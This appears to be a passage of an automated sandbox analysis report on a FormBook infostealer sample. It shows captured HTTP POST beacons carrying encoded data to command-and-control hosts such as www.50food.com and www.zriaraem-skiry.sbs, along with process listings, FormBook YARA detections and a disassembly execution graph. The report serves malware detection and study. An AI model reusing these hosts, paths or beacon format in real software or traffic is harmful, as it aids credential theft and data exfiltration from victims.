                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    31192.168.2.750004147.255.21.187806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:18:39.584207058 CET1762OUTPOST /u9hy/ HTTP/1.1
                                                                    Host: www.50food.com
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.50food.com
                                                                    Referer: http://www.50food.com/u9hy/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1250
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 62 6f 34 4c 72 4a 51 70 35 57 6a 52 41 6d 43 50 63 58 2b 38 4a 72 75 4a 45 59 31 47 74 45 5a 56 78 70 79 30 63 67 59 57 35 54 36 54 56 33 49 63 55 61 38 59 47 4a 57 32 35 34 57 7a 63 73 44 6f 4c 45 42 72 38 7a 79 57 67 68 2b 48 51 34 2b 68 70 62 49 65 4d 62 5a 6e 4f 68 72 75 73 41 56 6f 48 79 67 76 75 4e 63 61 6f 62 31 6c 4b 36 6b 79 57 54 6a 6a 75 6d 2f 56 79 62 62 76 4a 48 42 69 77 43 67 4d 64 56 76 6d 48 4a 41 51 53 31 50 57 55 43 33 35 69 59 4f 5a 2b 49 33 66 55 6d 4a 2f 33 62 65 71 44 39 72 75 38 70 43 63 59 2b 4c 44 75 64 71 6c 73 45 49 72 52 38 2b 64 56 57 33 74 73 70 65 70 51 59 64 7a 4e 67 4e 49 74 54 74 48 4d 61 34 6e 67 47 61 5a 46 43 35 66 6f 35 6f 74 4b 77 32 6a 71 45 64 63 58 4e 51 34 6b 5a 53 4e 73 65 58 48 6b 68 30 64 6b 59 4a 4a 4c 6e 39 58 4f 52 6b 57 73 51 66 48 39 38 49 58 54 6c 35 6c 57 46 66 47 30 50 63 36 67 5a 37 76 52 6f 35 36 44 38 67 55 58 54 62 57 67 33 53 43 2f 33 69 68 39 50 47 74 4f 74 34 63 45 36 77 79 34 41 66 38 4e 63 5a 2b 4c 49 6a 6b 79 46 4d 56 [TRUNCATED]
                                                                    Data Ascii: QbUPL=bo4LrJQp5WjRAmCPcX+8JruJEY1GtEZVxpy0cgYW5T6TV3IcUa8YGJW254WzcsDoLEBr8zyWgh+HQ4+hpbIeMbZnOhrusAVoHygvuNcaob1lK6kyWTjjum/VybbvJHBiwCgMdVvmHJAQS1PWUC35iYOZ+I3fUmJ/3beqD9ru8pCcY+LDudqlsEIrR8+dVW3tspepQYdzNgNItTtHMa4ngGaZFC5fo5otKw2jqEdcXNQ4kZSNseXHkh0dkYJJLn9XORkWsQfH98IXTl5lWFfG0Pc6gZ7vRo56D8gUXTbWg3SC/3ih9PGtOt4cE6wy4Af8NcZ+LIjkyFMViGtMi2J/OXj1P8H2Mxb2B0k5oa/NCndA2qo/4w/MsVeyr7gwriLC7GHtFH5qj713FXm3azTAIXDdbRm9M3Q0hOf42CVLwW06V2SgKfuFwR6cQNVAAdSwRehTww6FxSzHt91THfwEdb72aXa/0aHcUSOHRokQrJp9eNYnEvltERFCfjIwZzmGz7EavK/eFXn6fInrQXVYq13Jw+EvJdsj7wQcH1CJ9j3cJd+Jxgqy6W++pr7+xKw3hqR4+nQYOnJRIeYD1StI9HE04W+8QMxA+3pvPiZirY4Bsw2IzaQxKBNAu2vxE31air6JOHmiMcDRzmhQAqN7PzH8/KlXYQYxEoVCW8MESg3TnPBblZYK/Yw5cKoXUN9znLmo2P8OSy8AxG/JJBVdq0HrMN5RocrlyiviBDLS60omYY2C0u1DQ35I3+bkJ2kSadALg7AA/3Iq8Y8N7Cd+h9YQqGGy7WoAU0SRWnM52NnTFB6MMqtPkv32Js+gWNFjUV42VvO3UXl8+dsRoBTCWCIaQjYxrhghA5ppzwGUxDdIizV9KtM/VvB4PCPIgxupEHx9YJXz6btw6c8Yj+zZ3xVMQkT2CS5SGRn1VkG8YnbKgeIbgTf65VMDKlF+KKZw7JIhF+RnhnIimBWyEwFZpXbWfwk5fD5Y9LLMv+NlxTzf2y [TRUNCATED]
                                                                    Jan 11, 2025 08:18:40.173273087 CET309INHTTP/1.1 403 Forbidden
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 07:18:35 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    32192.168.2.750005147.255.21.187806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:18:42.128494978 CET478OUTGET /u9hy/?QbUPL=WqQro+xdjTeJIlGzWne5GtaANfF9lgg49rKxVxpmjgGfbhgcY6AAEIO8u8GwbvTJPVNB3UOdkxCDRvWF6atxJpdnDAzWn2dcKGou59R0p8ISVdotXCTwv0fS6r3BHVImiCcwST7dAbkv&ef4=TJYXELnhFJhl HTTP/1.1
                                                                    Host: www.50food.com
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Jan 11, 2025 08:18:42.698919058 CET141INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 07:18:38 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 0
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    33192.168.2.750006104.21.42.77806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:18:47.764175892 CET753OUTPOST /f8c6/ HTTP/1.1
                                                                    Host: www.zriaraem-skiry.sbs
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.zriaraem-skiry.sbs
                                                                    Referer: http://www.zriaraem-skiry.sbs/f8c6/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 218
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 6e 62 6a 52 64 34 6a 44 44 6f 47 6e 53 68 41 4b 37 5a 4c 36 56 38 62 38 34 30 75 6c 79 36 67 57 52 57 6f 64 79 65 71 54 4c 43 6a 31 44 74 63 7a 70 75 45 51 68 37 72 46 6e 62 7a 54 45 4c 65 4c 66 74 50 37 54 67 41 48 56 47 2b 64 67 55 71 39 4c 42 6d 6d 34 68 44 75 34 76 30 6a 67 72 6a 5a 52 4e 2f 2f 46 46 47 48 55 74 35 46 33 38 6f 44 38 77 35 52 62 48 79 4b 55 7a 45 59 46 6c 39 6f 45 2f 49 2b 72 44 34 70 32 54 4e 6d 5a 74 6f 5a 6a 32 31 53 55 54 45 61 59 78 48 62 73 59 77 50 39 56 76 45 51 68 34 66 73 79 31 56 79 2b 6d 4c 6c 2f 67 48 4a 69 54 6e 71 77 52 57 6b 70 51 68 33 67 41 70 66 6f 45 2f 4a 7a 4e 39 5a 47 63 34 4f 77 3d 3d
                                                                    Data Ascii: QbUPL=nbjRd4jDDoGnShAK7ZL6V8b840uly6gWRWodyeqTLCj1DtczpuEQh7rFnbzTELeLftP7TgAHVG+dgUq9LBmm4hDu4v0jgrjZRN//FFGHUt5F38oD8w5RbHyKUzEYFl9oE/I+rD4p2TNmZtoZj21SUTEaYxHbsYwP9VvEQh4fsy1Vy+mLl/gHJiTnqwRWkpQh3gApfoE/JzN9ZGc4Ow==


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    34192.168.2.750007104.21.42.77806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:18:50.329575062 CET773OUTPOST /f8c6/ HTTP/1.1
                                                                    Host: www.zriaraem-skiry.sbs
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.zriaraem-skiry.sbs
                                                                    Referer: http://www.zriaraem-skiry.sbs/f8c6/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 238
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 6e 62 6a 52 64 34 6a 44 44 6f 47 6e 54 42 77 4b 35 35 33 36 63 38 62 37 33 55 75 6c 6b 4b 68 64 52 58 55 64 79 62 4b 44 4c 51 58 31 47 34 67 7a 6d 50 45 51 78 72 72 46 6f 4c 7a 53 4b 72 65 4d 66 74 53 4d 54 6c 41 48 56 48 61 64 67 51 36 39 4c 51 6e 55 37 52 44 73 33 50 30 68 2f 37 6a 5a 52 4e 2f 2f 46 46 43 74 55 74 68 46 33 4d 34 44 7a 78 35 53 52 6e 79 4a 64 54 45 59 55 31 39 6b 45 2f 4a 64 72 42 4d 54 32 58 39 6d 5a 76 67 5a 6a 69 70 64 50 6a 45 6d 57 52 47 69 39 59 35 33 37 31 37 47 53 77 49 6c 71 41 4a 4f 36 6f 6e 70 2f 64 73 72 58 7a 72 63 75 79 31 67 7a 50 4e 55 31 68 45 78 53 4b 77 65 57 45 6f 58 55 55 39 38 59 45 57 33 6a 32 4a 55 51 49 52 41 51 53 35 33 34 49 72 4f 41 71 73 3d
                                                                    Data Ascii: QbUPL=nbjRd4jDDoGnTBwK5536c8b73UulkKhdRXUdybKDLQX1G4gzmPEQxrrFoLzSKreMftSMTlAHVHadgQ69LQnU7RDs3P0h/7jZRN//FFCtUthF3M4Dzx5SRnyJdTEYU19kE/JdrBMT2X9mZvgZjipdPjEmWRGi9Y53717GSwIlqAJO6onp/dsrXzrcuy1gzPNU1hExSKweWEoXUU98YEW3j2JUQIRAQS534IrOAqs=


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    35192.168.2.750008104.21.42.7780
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:18:54.397610903 CET1786OUTPOST /f8c6/ HTTP/1.1
                                                                    Host: www.zriaraem-skiry.sbs
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.zriaraem-skiry.sbs
                                                                    Referer: http://www.zriaraem-skiry.sbs/f8c6/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1250
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 6e 62 6a 52 64 34 6a 44 44 6f 47 6e 54 42 77 4b 35 35 33 36 63 38 62 37 33 55 75 6c 6b 4b 68 64 52 58 55 64 79 62 4b 44 4c 51 50 31 61 65 30 7a 6e 73 73 51 79 72 72 46 75 37 7a 58 4b 72 66 4a 66 74 4b 49 54 6c 45 58 56 46 53 64 6d 43 79 39 66 79 50 55 73 42 44 73 31 50 30 73 67 72 69 54 52 4a 6a 42 46 46 53 74 55 74 68 46 33 50 51 44 33 67 35 53 65 48 79 4b 55 7a 45 63 46 6c 39 49 45 38 34 6d 72 42 59 44 32 6b 31 6d 5a 50 77 5a 68 58 31 64 44 6a 45 67 56 52 47 54 39 59 6c 6f 37 31 6d 35 53 77 4e 43 71 41 78 4f 35 2f 4b 77 67 35 67 74 42 42 44 33 77 42 52 54 34 70 55 69 7a 58 46 48 4e 4e 55 61 62 56 30 42 4e 48 6c 42 54 6b 66 73 2b 55 42 64 5a 59 64 54 58 48 59 56 67 34 44 4d 52 65 51 4a 4a 31 6a 74 67 62 4e 30 78 73 53 2b 35 7a 44 79 6f 7a 7a 46 49 65 6e 72 62 48 45 2f 66 77 6a 39 71 6f 4b 76 34 43 44 4c 68 48 69 4f 30 42 48 76 74 51 58 75 77 6d 75 39 61 6d 68 6b 53 58 63 50 4e 47 72 67 4c 65 49 2b 4a 6b 30 63 49 77 38 43 48 49 57 4d 74 49 42 4f 44 61 50 37 46 76 6a 76 43 51 42 64 [TRUNCATED]
                                                                    Data Ascii: QbUPL=nbjRd4jDDoGnTBwK5536c8b73UulkKhdRXUdybKDLQP1ae0znssQyrrFu7zXKrfJftKITlEXVFSdmCy9fyPUsBDs1P0sgriTRJjBFFStUthF3PQD3g5SeHyKUzEcFl9IE84mrBYD2k1mZPwZhX1dDjEgVRGT9Ylo71m5SwNCqAxO5/Kwg5gtBBD3wBRT4pUizXFHNNUabV0BNHlBTkfs+UBdZYdTXHYVg4DMReQJJ1jtgbN0xsS+5zDyozzFIenrbHE/fwj9qoKv4CDLhHiO0BHvtQXuwmu9amhkSXcPNGrgLeI+Jk0cIw8CHIWMtIBODaP7FvjvCQBdlgQi0/4Kp1Xv2B3C366F7lGfSxIT9kjjDpIGkeVQREgGc14QMt9YccIcTJKZfxE/O21dCrjzPjUDDx/TTtO5/7ABSxhbRo/tOO1Xs26j5mr46B/1ddwluoY63OEc0Bw8/JRC0OqwYklv3PC1omEzsCLadjgCifd6nH9ipToRdUaCL23JnA8tGabSvyay/leIs9Xi7RWmq0Cytf/IEfPnb6DoeLwu6MQZYX9W23SM+gBZlE5B+77BrodBB/NZxBohA7326mJwJ51Av1N/FrDEqVHnkd8MRcdVUGV55tJsz/eZo9mtITM/mDfAG5q716vYb8MXN6ewqTgQlowMxpUcwTbvXg9839Wyyi9RGH22m5pX/2eNTlL4sb6MDAYvsNgfXNJgLskWPqGt30eUkawu3KkHZrEnM4CuPELwZ6MGV2VFK0kQoDFp5MNYEVcMx2JInb5/RhOLJxp3B63cVFw5krUOrKbBn2+dU9Hlck2b55oZOtgLecj0qEhHEDaF6cksqSsGpEH9QUrxMiv0WhJDOJcRFtU+u8nD00V4s+0EMjp4z5mLRqiai4WMk/eoFHo21JfB54eXV9xqrWVnhDpS7liqNy7tCZw8k+DaEMMWho/acIp/jlHka0bfPBmmIB6xs66kT3yCH3Ioa+568oEpLLC86EZbcXCPbn [TRUNCATED]


                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:02:15:45
                                                                    Start date:11/01/2025
                                                                    Path:C:\Users\user\Desktop\z6tNjJC614.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\z6tNjJC614.exe"
                                                                    Imagebase:0x510000
                                                                    File size:1'225'216 bytes
                                                                    MD5 hash:043A47D412717C236558774C700BB159
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:8
                                                                    Start time:02:15:49
                                                                    Start date:11/01/2025
                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\z6tNjJC614.exe"
                                                                    Imagebase:0x170000
                                                                    File size:46'504 bytes
                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1635438569.0000000003810000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1635938025.0000000006800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1635105463.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:11
                                                                    Start time:04:04:43
                                                                    Start date:11/01/2025
                                                                    Path:C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe"
                                                                    Imagebase:0x170000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3136712972.00000000086F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3128378843.00000000051C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:12
                                                                    Start time:04:04:47
                                                                    Start date:11/01/2025
                                                                    Path:C:\Windows\SysWOW64\winver.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\SysWOW64\winver.exe"
                                                                    Imagebase:0xd20000
                                                                    File size:57'344 bytes
                                                                    MD5 hash:B5471B0FB5402FC318C82C994C6BF84D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3127767556.0000000004150000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3127852915.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3124391485.0000000000490000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:14
                                                                    Start time:04:05:15
                                                                    Start date:11/01/2025
                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                    Imagebase:0x7ff722870000
                                                                    File size:676'768 bytes
                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Disassembly

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:3.8%
                                                                      Dynamic/Decrypted Code Coverage:1.3%
                                                                      Signature Coverage:9%
                                                                      Total number of Nodes:2000
                                                                      Total number of Limit Nodes:58
                                                                      execution_graph 100738 1036923 100741 1036598 100738->100741 100740 103696f 100754 1033fc8 100741->100754 100743 1036637 100746 1036691 VirtualAlloc 100743->100746 100747 1036675 100743->100747 100752 1036798 CloseHandle 100743->100752 100753 10367a8 VirtualFree 100743->100753 100757 10374a8 GetPEB 100743->100757 100745 1036668 CreateFileW 100745->100743 100745->100747 100746->100747 100748 10366b2 ReadFile 100746->100748 100749 1036892 100747->100749 100750 1036884 VirtualFree 100747->100750 100748->100747 100751 10366d0 VirtualAlloc 100748->100751 100749->100740 100750->100749 100751->100743 100751->100747 100752->100743 100753->100743 100759 1037448 GetPEB 100754->100759 100756 1034653 100756->100743 100758 10374d2 100757->100758 100758->100745 100760 1037472 100759->100760 100760->100756 100761 513633 100762 51366a 100761->100762 100763 5136e7 100762->100763 100764 513688 100762->100764 100798 5136e5 100762->100798 100768 54d0cc 100763->100768 100769 5136ed 100763->100769 100765 513695 100764->100765 100766 51374b PostQuitMessage 100764->100766 100771 54d154 100765->100771 100772 5136a0 100765->100772 100803 5136d8 100766->100803 100767 5136ca DefWindowProcW 100767->100803 100816 521070 10 API calls Mailbox 100768->100816 100773 5136f2 100769->100773 100774 513715 SetTimer RegisterWindowMessageW 100769->100774 100832 572527 71 API calls _memset 100771->100832 100776 513755 100772->100776 100777 5136a8 100772->100777 100780 5136f9 KillTimer 100773->100780 100781 54d06f 100773->100781 100778 51373e CreatePopupMenu 100774->100778 100774->100803 100775 54d0f3 100817 521093 331 API calls Mailbox 100775->100817 100806 5144a0 100776->100806 100783 5136b3 100777->100783 100784 54d139 100777->100784 100778->100803 100813 51443a Shell_NotifyIconW _memset 100780->100813 100787 54d074 100781->100787 100788 54d0a8 MoveWindow 100781->100788 100790 54d124 100783->100790 100799 5136be 100783->100799 100784->100767 100831 567c36 59 API calls Mailbox 100784->100831 100785 54d166 100785->100767 100785->100803 100791 54d097 SetFocus 100787->100791 100792 54d078 100787->100792 100788->100803 100830 572d36 81 API calls _memset 100790->100830 100791->100803 100795 54d081 100792->100795 100792->100799 100793 51370c 100814 513114 DeleteObject DestroyWindow Mailbox 100793->100814 100815 521070 10 API calls Mailbox 100795->100815 100798->100767 100799->100767 100818 51443a Shell_NotifyIconW _memset 100799->100818 100801 54d134 100801->100803 100804 54d118 100819 51434a 100804->100819 100807 5144b7 _memset 100806->100807 100808 514539 100806->100808 100833 51407c 100807->100833 100808->100803 100810 514522 KillTimer SetTimer 100810->100808 100811 5144de 100811->100810 100812 54d4ab Shell_NotifyIconW 100811->100812 100812->100810 100813->100793 100814->100803 100815->100803 100816->100775 100817->100799 100818->100804 100820 514375 _memset 100819->100820 100952 514182 100820->100952 100823 5143fa 100825 514430 Shell_NotifyIconW 100823->100825 100826 514414 Shell_NotifyIconW 100823->100826 100827 514422 100825->100827 100826->100827 100828 51407c 61 API calls 100827->100828 100829 514429 100828->100829 100829->100798 100830->100801 100831->100798 100832->100785 100834 514098 100833->100834 100854 51416f Mailbox 100833->100854 100855 517a16 100834->100855 100837 5140b3 100860 517bcc 100837->100860 100838 54d3c8 LoadStringW 100840 54d3e2 100838->100840 100842 517b2e 59 API calls 100840->100842 100841 5140c8 100841->100840 100843 5140d9 100841->100843 100848 54d3ec 100842->100848 100844 5140e3 100843->100844 100845 514174 100843->100845 100869 517b2e 100844->100869 100878 518047 100845->100878 100850 5140ed _memset _wcscpy 100848->100850 100882 517cab 100848->100882 100852 514155 Shell_NotifyIconW 100850->100852 100851 54d40e 100853 517cab 59 API calls 100851->100853 100852->100854 100853->100850 100854->100811 100889 530db6 100855->100889 100857 517a3b 100899 518029 100857->100899 100861 517c45 100860->100861 100862 517bd8 __NMSG_WRITE 100860->100862 100931 517d2c 100861->100931 100864 517c13 100862->100864 100865 517bee 100862->100865 100867 518029 59 API calls 100864->100867 100930 517f27 59 API calls Mailbox 100865->100930 100868 517bf6 _memmove 100867->100868 100868->100841 100870 517b40 100869->100870 100871 54ec6b 100869->100871 100939 517a51 100870->100939 100945 567bdb 59 API calls _memmove 100871->100945 100874 517b4c 100874->100850 100875 54ec75 100876 518047 59 API calls 100875->100876 100877 54ec7d Mailbox 100876->100877 100879 518052 100878->100879 100880 51805a 100878->100880 100946 517f77 59 API calls 2 library calls 100879->100946 100880->100850 100883 54ed4a 100882->100883 100884 517cbf 100882->100884 100886 518029 59 API calls 100883->100886 100947 517c50 100884->100947 100888 54ed55 __NMSG_WRITE _memmove 100886->100888 100887 517cca 100887->100851 100892 530dbe 100889->100892 100891 530dd8 100891->100857 100892->100891 100894 530ddc std::exception::exception 100892->100894 100902 53571c 100892->100902 100919 5333a1 DecodePointer 100892->100919 100920 53859b RaiseException 100894->100920 100896 530e06 100921 5384d1 58 API calls _free 100896->100921 100898 530e18 100898->100857 100900 530db6 Mailbox 59 API calls 100899->100900 100901 5140a6 100900->100901 100901->100837 100901->100838 100903 535797 100902->100903 100914 535728 100902->100914 100928 5333a1 DecodePointer 100903->100928 100905 53579d 100929 538b28 58 API calls __getptd_noexit 100905->100929 100908 53575b RtlAllocateHeap 100908->100914 100918 53578f 100908->100918 100910 535783 100926 538b28 58 API calls __getptd_noexit 100910->100926 100914->100908 100914->100910 100915 535781 100914->100915 100916 535733 100914->100916 100925 5333a1 DecodePointer 100914->100925 100927 538b28 58 API calls __getptd_noexit 100915->100927 100916->100914 100922 53a16b 58 API calls __NMSG_WRITE 100916->100922 100923 53a1c8 58 API calls 6 library calls 100916->100923 100924 53309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100916->100924 100918->100892 100919->100892 100920->100896 100921->100898 100922->100916 100923->100916 100925->100914 100926->100915 100927->100918 100928->100905 100929->100918 100930->100868 100932 517d3a 100931->100932 100934 517d43 _memmove 100931->100934 100932->100934 100935 517e4f 100932->100935 100934->100868 100936 517e62 100935->100936 100938 517e5f _memmove 100935->100938 100937 530db6 Mailbox 59 API calls 100936->100937 100937->100938 100938->100934 100940 517a5f 100939->100940 100944 517a85 _memmove 100939->100944 100941 530db6 Mailbox 59 API calls 100940->100941 100940->100944 100942 517ad4 100941->100942 100943 530db6 Mailbox 59 API calls 100942->100943 100943->100944 100944->100874 100945->100875 100946->100880 100948 517c5f __NMSG_WRITE 100947->100948 100949 518029 59 API calls 100948->100949 100950 517c70 _memmove 100948->100950 100951 54ed07 _memmove 100949->100951 100950->100887 100953 54d423 100952->100953 100954 514196 100952->100954 100953->100954 100955 54d42c DestroyIcon 100953->100955 100954->100823 100956 572f94 62 API calls _W_store_winword 100954->100956 100955->100954 100956->100823 100957 54fe27 100970 52f944 100957->100970 100959 54fe3d 100960 54fe53 100959->100960 100961 54febe 100959->100961 101059 519e5d 60 API calls 100960->101059 100979 51fce0 100961->100979 100963 54fe92 100965 55089c 100963->100965 100966 54fe9a 100963->100966 101061 579e4a 89 API calls 4 library calls 100965->101061 101060 57834f 59 API calls Mailbox 100966->101060 100969 54feb2 Mailbox 100971 52f962 100970->100971 100972 52f950 100970->100972 100974 52f991 100971->100974 100975 52f968 100971->100975 